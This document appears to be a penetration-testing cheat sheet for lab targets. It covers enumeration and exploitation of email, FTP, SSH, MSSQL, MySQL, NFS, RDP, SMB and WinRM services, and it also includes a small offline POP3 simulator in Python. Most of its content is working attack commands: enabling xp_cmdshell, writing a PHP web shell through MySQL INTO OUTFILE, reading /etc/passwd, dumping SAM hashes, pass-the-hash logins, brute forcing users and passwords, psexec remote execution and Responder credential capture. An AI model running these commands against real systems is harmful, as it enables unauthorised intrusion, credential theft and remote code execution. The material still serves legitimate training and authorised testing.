Email Services
Discovery of common ports used for email services:
sudo nmap -Pn -sV -sC -p25,143,110,465,993,995 10.129.14.128
Interact with POP3 and IMAP
Example with cURL:
curl -k 'imaps://10.129.14.128' --user user:p4ssw0rd
OpenSSL - TLS Encrypted Interaction POP3
To interact with the IMAP or POP3 server over SSL, we can use openssl as well as ncat. The commands for this look like this:
openssl s_client -connect 10.129.14.128:pop3s
OpenSSL - TLS Encrypted Interaction IMAP
openssl s_client -connect 10.129.14.128:imaps
IMAP Commands (when typed manually, every IMAP command must be prefixed with a unique tag, e.g. a1 LOGIN <username> <password>):
User's login:
LOGIN <username> <password>
List all directories:
LIST "" *
Creates a mailbox with a specified name:
CREATE "<newName>"
Delete a mailbox:
DELETE "<newName>"
Renames a mailbox (existing name first, new name second):
RENAME "<currentName>" "<newName>"
Returns a subset of names from the set of names that the user has declared as being active or subscribed:
LSUB "" *
Select a mailbox so that messages in the mailbox can be accessed:
SELECT <nameMailbox>
Exits the selected mailbox (takes no argument):
UNSELECT
Retrieves data associated with a message in the mailbox:
FETCH <ID> all
Removes all messages with the deleted flag:
CLOSE
Closes the connection with the IMAP server:
LOGOUT
POP3 Commands
Identifies the user:
USER <username>
Authenticates the user with their password:
PASS <password>
Requests the number of saved emails from the server:
STAT
Requests the number and size of all emails from the server:
LIST
Requests the server to deliver the requested email by ID:
RETR <ID>
Requests the server to delete the requested email by ID:
DELE <ID>
Requests the server to display the server capabilities:
CAPA
Requests the server to reset the transmitted information:
RSET
Closes the connection with the POP3 server:
QUIT
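As an added example (not part of the original notes), the POP3 commands above replayed against a minimal in-memory server that implements the RFC 1939 state machine; the credentials and messages are constructed sample data, so it runs offline and shows the reply each command gets, including how RSET undoes DELE and QUIT commits it.

```python
MAILBOX_USER, MAILBOX_PASS = "user", "p4ssw0rd"      # constructed credentials
SAMPLE_MAIL = ["Subject: hi\r\n\r\nfirst", "Subject: re\r\n\r\nsecond"]  # constructed messages

class Pop3Session:
    """Minimal RFC 1939 server: AUTHORIZATION -> TRANSACTION -> UPDATE."""
    def __init__(self, mail):
        self.mail = list(mail)      # messages, addressed by 1-based ID
        self.deleted = set()        # IDs flagged by DELE, committed only on QUIT
        self.state = "AUTHORIZATION"
        self.user = None

    def handle(self, line):
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if self.state == "AUTHORIZATION":
            if cmd == "USER":
                self.user = arg; return "+OK"
            if cmd == "PASS" and self.user == MAILBOX_USER and arg == MAILBOX_PASS:
                self.state = "TRANSACTION"; return "+OK logged in"
            if cmd == "PASS":
                return "-ERR invalid credentials"
            if cmd == "CAPA":
                return "+OK\r\nUSER\r\n."
            if cmd == "QUIT":
                return "+OK bye"
            return "-ERR not authenticated"
        live = [i for i in range(1, len(self.mail) + 1) if i not in self.deleted]
        if cmd == "STAT":                      # message count and total size
            return f"+OK {len(live)} {sum(len(self.mail[i - 1]) for i in live)}"
        if cmd == "LIST":                      # multi-line reply terminated by "."
            return "+OK\r\n" + "".join(f"{i} {len(self.mail[i - 1])}\r\n" for i in live) + "."
        if cmd in ("RETR", "DELE"):
            if not arg.isdigit() or int(arg) not in live:
                return "-ERR no such message"
            if cmd == "DELE":
                self.deleted.add(int(arg)); return "+OK marked for deletion"
            return f"+OK\r\n{self.mail[int(arg) - 1]}\r\n."
        if cmd == "RSET":                      # unmark everything flagged by DELE
            self.deleted.clear(); return "+OK"
        if cmd == "QUIT":                      # UPDATE state: deletions take effect
            self.state = "UPDATE"
            for i in sorted(self.deleted, reverse=True):
                del self.mail[i - 1]
            return "+OK bye"
        return "-ERR unknown command"

def run_exchange(session, commands):
    """Replay client commands and return [(client line, server reply), ...]."""
    return [(c, session.handle(c)) for c in commands]
```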
SMTP commands:
Service extension used to authenticate the client:
AUTH PLAIN
The client logs in with its computer name and thus starts the session:
HELO
The client names the email sender:
MAIL FROM
The client names the email recipient:
RCPT TO
The client initiates the transmission of the email:
DATA
The client aborts the transmission but keeps the connection between client and server:
RSET
The client checks if a mailbox is available for message transfer:
VRFY
This command can be used to enumerate existing users on the system. However, this does not always work.
VRFY <username>
Another way is to brute force valid users with smtp-user-enum:
smtp-user-enum -w 25 -M VRFY -u <pathUsersList> -t <IP>
The client also checks if a mailbox is available for messaging:
EXPN
Interact with Telnet:
telnet <IP> 25
FTP
Command syntax:
ftp <user>@<IP>
or:
ftp <IP>
Default credentials
anonymous : (blank password)
Common port
21 or 2121
Interesting commands
- List content: ls
- Download a file: get
- Download all: mget *
- Upload single file: put
Download All Available Files
wget -m --no-passive ftp://anonymous:anonymous@10.129.14.136:port
wget -m --no-passive ftp://user:password@IP:port
This can be useful when the server allows anonymous FTP access but the interactive client does not let you download files.
Service interaction
nc -nv <IP> <port>
telnet <IP> <port>
It looks slightly different if the FTP server runs with TLS/SSL encryption, because then we need a client that can handle TLS/SSL. For this, we can use the openssl client to communicate with the FTP server. The good thing about using openssl is that we can also see the SSL certificate, which can be helpful.
openssl s_client -connect <IP>:<port> -starttls ftp
SSH
Command syntax:
ssh <userName>@<IP> -p <port>
User enumeration (Metasploit)
msf> use scanner/ssh/ssh_enumusers
Connect with private key (without password)
It is necessary to restrict the permissions of the RSA private key:
chmod 600 <idRSA>
Command to connect to SSH with the Private Key:
ssh <userName>@<IP> -p <port> -i <idRSA>
MSSQL
NMAP MSSQL Script Scan
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
Many clients can be used to access a database running on MSSQL, including but not limited to:
Connecting with Mssqlclient.py
python3 mssqlclient.py -p <port> <username>@<IP> -windows-auth
Tool: https://github.com/fortra/impacket/blob/master/examples/mssqlclient.py
Connecting with sqsh:
sqsh -S <IP> -U <username> -P '<password>' -h
When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we are targeting a local account, we can use SERVERNAME\\accountname or .\\accountname. Example:
sqsh -S <IP> -U .\\<username> -P '<password>' -h
Connecting with sqlcmd
Example:
sqlcmd -S <server_name> -d <database_name> -U <username> -P <password> -Q "<Query;>"
Interesting commands:
List databases:
select name from sys.databases
or:
SELECT name FROM master.dbo.sysdatabases
Read local file:
1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO
Execute commands
1> xp_cmdshell '<command>'
2> GO
If xp_cmdshell is not enabled, it can be enabled using the following commands:
1> EXECUTE sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> EXECUTE sp_configure 'xp_cmdshell', 1
6> GO
7> RECONFIGURE
8> GO
Select a specific database:
USE <database>
Search tables
1> SELECT table_name FROM <database>.INFORMATION_SCHEMA.TABLES
2> GO
Verifying our Current User and Role
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> GO
Identify Users that We Can Impersonate
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO
Impersonating the SA User
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO
Identify linked Servers
1> SELECT srvname, isremote FROM sysservers
2> GO
Interesting modules in Metasploit
[msf] > auxiliary(scanner/mssql/mssql_login)
[msf] > auxiliary(admin/mssql/mssql_enum)
MySQL
Command syntax:
mysql -u <username> -p -h <IP>
If you have SSH access with a valid user, you can view the running processes. If the MySQL service is active on localhost, it can be accessed in the following manner:
user@kali:/$ mysql -p<password>
Information gathering
sudo nmap <IP> -sV -sC -p3306 --script mysql*
Detect version with Metasploit
msf> use auxiliary/scanner/mysql/mysql_version
Enumeration with Metasploit
msf> use auxiliary/admin/mysql/mysql_enum
Interesting commands
To show databases:
show databases;
Select database:
use <database>;
Show tables:
show tables;
More information about a table:
describe <tableName>;
To show columns from a table:
show columns from <table>;
Query example:
1
Select * from <table> where <column> = <string>";
Write local file:
select "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
Read local file:
select LOAD_FILE("/etc/passwd");
NFS
Footprinting the service
sudo nmap <IP> -p111,2049 -sV -sC
The rpcinfo NSE script retrieves a list of all currently running RPC services, their names and descriptions, and the ports they use.
sudo nmap --script nfs* <IP> -sV -p111,2049
Show available NFS shares
showmount -e <IP>
Mounting NFS share:
mkdir <directory>
sudo mount -t nfs <IP>:/ ./<directory>/ -o nolock
cd <directory>
tree .
List Contents with Usernames & Group Names
ls -l mnt/nfs/
List Contents with UIDs & GIDs
ls -n mnt/nfs/
Unmounting
sudo umount <directory>
RDP - Remote Desktop Protocol
Footprinting the service
nmap -sV -sC <IP> -p3389 --script rdp*
The service is:
3389/tcp open ms-wbt-server Microsoft Terminal Services
Different ways to connect with known credentials
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
rdesktop <IP>
Modify the registry
Sometimes it is necessary to add a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa.
If xfreerdp does not allow the connection, we connect using evil-winrm:
evil-winrm -i <IP> -u <username> -p <password>
And it is necessary to run this:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Once the registry key is added, we can use xfreerdp to gain RDP access.
Pass the hash
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>
SMB (SAMBA)
Scan network
nbtscan -r <range>
Enumerating information with Enum4linux
Command syntax:
enum4linux -U -o -d <IP>
Other commands for enumeration:
nmblookup -A <IP>
rpcclient -U "" <IP>
Metasploit
[msf] > use auxiliary/scanner/smb/smb_login
List the shared resources of an SMB server:
Command syntax:
smbclient -L \\\\<IP>
with credentials:
smbclient -L \\\\<IP> -U <username>
Access to the shared resources of an SMB server:
Command syntax:
smbclient \\\\<IP>\\<directory>
With user:
smbclient \\\\<IP>\\<directory> -U <username>
Another way to access SMB - rpcclient
rpcclient -U "" -N <IP>
With username:
rpcclient -U <username> <IP>
With credentials:
rpcclient -U <username>%<password> <IP>
Command for enumeration:
srvinfo
enumdomains
netshareenumall
enumdomusers
queryuser 0x3e9
Interesting commands:
ls
cd
get <file>
mget *
put <file>
Enumerate users
nmap -sU -sS --script=smb-enum-users <IP>
Crackmapexec
Syntax:
crackmapexec <protocol> <IP> -u <user> -p '<password>'
Example password attack:
crackmapexec <protocol> <IP> -u <userList> -p '<password>'
More examples:
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password' -x 'whoami' --exec-method smbexec
crackmapexec smb 10.129.14.128 --shares -u '' -p ''
sudo crackmapexec smb 10.129.18.11 -u "user" -p /home/user/Desktop/pass.txt -d ATTCSVC-LINUX
If the type command doesn’t work to see files, you can use get file:
crackmapexec smb 10.129.84.255 -u Administrator -H 7796ee39fd3a9c3a1844556115ae1a54 --get-file Users/Administrator/Desktop/flag.txt /home/flag
Enumerating Users
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --users
Enumerating Logged-on Users
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
Extract Hashes from SAM Database
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
Pass-the-Hash (PtH)
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
PsExec
impacket-psexec is a tool in the Impacket framework that enables remote code execution on Windows systems using the SMB (Server Message Block) protocol. It allows authenticated users to execute commands or upload and run binaries on a remote Windows machine, simulating the behavior of the native Windows “psexec” tool.
impacket-psexec <username>:'<password>'@<IP>
Responder
We can also abuse the SMB protocol by creating a fake SMB server to capture users' authentication attempts (see https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4).
Syntax:
responder -I <interfaceName>
WinRM
Footprinting the service
nmap -sV -sC <IP> -p5985,5986 --disable-arp-ping -n
Connect with remote servers with evil-winrm
evil-winrm -i <IP> -u <username> -p <password>
Connect with WinRM with Powershell
PS C:\> $password = ConvertTo-SecureString "<password>" -AsPlainText -Force
PS C:\> $cred = new-object System.Management.Automation.PSCredential ("<domain>\<username>", $password)
PS C:\> Enter-PSSession -ComputerName <computername> -Credential $cred
Brute force with crackmapexec
crackmapexec <protocol> <IP> -u <user or userlist> -p <password or passwordlist>
Example:
crackmapexec winrm 10.129.42.197 -u user.list -p password.list
Other tool: https://github.com/y0k4i-1337/winrm-brute